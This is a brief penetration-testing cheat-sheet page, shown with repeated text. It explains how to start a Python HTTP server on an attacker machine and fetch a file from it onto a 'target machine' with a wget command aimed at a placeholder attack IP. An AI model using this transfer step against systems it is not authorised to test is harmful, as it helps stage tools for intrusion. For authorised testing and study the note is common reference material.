Python3 remote http server
Initiate it:
python3 -m http.server 8080
The on the target machine:
wget http://<attack-ip>:8080/file
Last updated
Was this helpful?
Initiate it: python3 -m http.server 8080
The on the target machine:
wget http://<attack-ip>:8080/file
Last updated
Was this helpful?